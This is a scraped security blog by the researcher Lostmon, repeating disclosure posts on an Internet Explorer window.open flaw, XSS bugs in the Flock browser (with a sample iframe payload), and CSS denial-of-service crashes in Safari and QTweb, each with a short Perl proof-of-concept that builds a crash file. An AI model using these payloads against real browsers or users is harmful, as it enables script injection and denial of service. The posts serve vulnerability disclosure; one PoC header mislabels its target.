#############################################
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability
Vendor URL: http://www.microsoft.com
Advisore: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html
Coordinate Dislcosure: YES exploit available: Private
CVE-2011-1257 and MS011-57
#############################################
Microsoft Internet Explorer 6, 7 and 8 is prone vulnerable to a
Remote code execution due a race condition in window.open
javascript metod
A Remote attacker can compose a web page with malicious code
and wen a victim visit this malformed web doc, attacker can
exploit this situation.
######################
Solution
######################
Microsoft has issue a bulletin class with tecnical detalis about this issue
with this identifier [MS011-57]
you can found more detailed at this link:
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx
Also microsoft has issue a patch to solve this vulnerability
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx
for update your system.
############
Timeline
############
Discovered : January 13, 2011
Vendor Notify: January 19, 2011
Vendor Response: January 19, 2011
Vendor Patch: August 9, 2011
Public Disclosure: August 9, 2011
################# €nd #########################
Thnx to Michal Zalewski for his extraordinary mind
and knowledge, people like him should have a virtual
statue for the rest of the times
Thnx To Jack, Gerardo, Nate and all MSRC
for his support in this issue.
Thnx To Microsoft Vulnerability Research (MSVR)
for interesting in this issue and for coordinate
Disclosure in other browsers afected.
Thnx to All who Belive in Me include you Estrella :**
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability
Tuesday, August 09, 2011
Categories:
Acknowledgments,
browsers,
bug,
patch,
security,
vulnerability
Multiple vulnerabilities in Flock Browser 3.0.0.3989
Friday, March 11, 2011
#########################################
Multiple vulnerabilities in Flock Browser 3.0.0.3989
Vendor URL: http://beta.flock.com/
Vendor Advisores: http://www.flock.com/security/
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html
Vendor notify:YES exploits availables:YES
#########################################
Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.
Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :)
I have contributed in secure Flock browser, i have tested version with google chrome base.
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.
###############
TODO LIST / Bugs
###############
###########################
Advisores from Flock developers
###########################
FLOCK-SA-2010-04
Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-0661
Details:
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=32647
http://code.google.com/p/chromium/issues/detail?id=30660
FLOCK-SA-2010-03
Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4112
CVEs (cve.mitre.org): CVE-2010-1236
Details:
A javascript: url with a leading NULL byte can bypass cross origin protection,
which has unspecified impact and remote attack vectors.
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=35948
http://code.google.com/p/chromium/issues/detail?id=37383
FLOCK-SA-2010-02
Title: A malicious RSS feed can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4114
CVEs (cve.mitre.org): CVE-2010-3262
Details:
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,
which has unspecified impact and remote attack vectors.
Credit to Lostmon Lords.
FLOCK-SA-2010-01
Title: A malformed favourite can bypass cross origin protection (XSS)
Impact: Moderate
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-3202
Details:
A malformed favourite imported from an HTML file, imported from another browser,
or manually created can bypass cross-origin protection, which has unspecified impact
and attack vectors.
Credit to Lostmon Lords.
References: http://www.securityfocus.com/archive/1/513214
################################################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Multiple vulnerabilities in Flock Browser 3.0.0.3989
Vendor URL: http://beta.flock.com/
Vendor Advisores: http://www.flock.com/security/
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html
Vendor notify:YES exploits availables:YES
#########################################
Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.
Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :)
I have contributed in secure Flock browser, i have tested version with google chrome base.
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.
###############
TODO LIST / Bugs
###############
- Inspector window attributes script injection chrome bug 31590
- XSS in search engine in chrome://history/ chrome bug 13760( not exploitable from remote attackers ) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0)
- XSS in search box in favorites page ( chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title)(not explotable from remote attackers)
- XSS in search engine extension when paste in url (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable from remote attackers)
- XSS in social extension when try to login in facebook or twiter or youtube (not exploitable from remote attackers)
- XSS in rss vienwer in search box chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not exploitable from remote attackers)
- XSS in rss viewner when render xml from remote host if the entry has html it is executed when view the news across flock rss viewner(exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and them if you type in search box for example " or < it executes again the xss stored in xml file :)
- window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660
- url with a leading NULL byte can bypass cross origin protection Chrome bug 37383
###########################
Advisores from Flock developers
###########################
FLOCK-SA-2010-04
Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-0661
Details:
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=32647
http://code.google.com/p/chromium/issues/detail?id=30660
FLOCK-SA-2010-03
Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4112
CVEs (cve.mitre.org): CVE-2010-1236
Details:
A javascript: url with a leading NULL byte can bypass cross origin protection,
which has unspecified impact and remote attack vectors.
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=35948
http://code.google.com/p/chromium/issues/detail?id=37383
FLOCK-SA-2010-02
Title: A malicious RSS feed can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4114
CVEs (cve.mitre.org): CVE-2010-3262
Details:
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,
which has unspecified impact and remote attack vectors.
Credit to Lostmon Lords.
FLOCK-SA-2010-01
Title: A malformed favourite can bypass cross origin protection (XSS)
Impact: Moderate
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-3202
Details:
A malformed favourite imported from an HTML file, imported from another browser,
or manually created can bypass cross-origin protection, which has unspecified impact
and attack vectors.
Credit to Lostmon Lords.
References: http://www.securityfocus.com/archive/1/513214
################################################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Categories:
Acknowledgments,
browsers,
bug,
CSRF,
extensions,
security,
vulnerability,
XSS
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Wednesday, December 08, 2010
#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notify: NO exploit available: YES
##########################################################
QTweb browser for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
QTweb for windows 3.7(Build 063)
###########
Sample PoC
###########
Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.
#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_QTweb.html";
my $junk= "A/" x 20000016;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_QTweb.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notify: NO exploit available: YES
##########################################################
QTweb browser for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
QTweb for windows 3.7(Build 063)
###########
Sample PoC
###########
Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.
#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_QTweb.html";
my $junk= "A/" x 20000016;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_QTweb.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
#########################################################
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notify: NO exploit available: YES
##########################################################
Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
safari for windows 5.0.2(7533.18.5)
###########
Sample PoC
###########
Generate the Crash file and open it with safari,it hangs and arround one minut it crash
with a anormal program termination.
#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notify: NO exploit available: YES
##########################################################
Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
safari for windows 5.0.2(7533.18.5)
###########
Sample PoC
###########
Generate the Crash file and open it with safari,it hangs and arround one minut it crash
with a anormal program termination.
#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)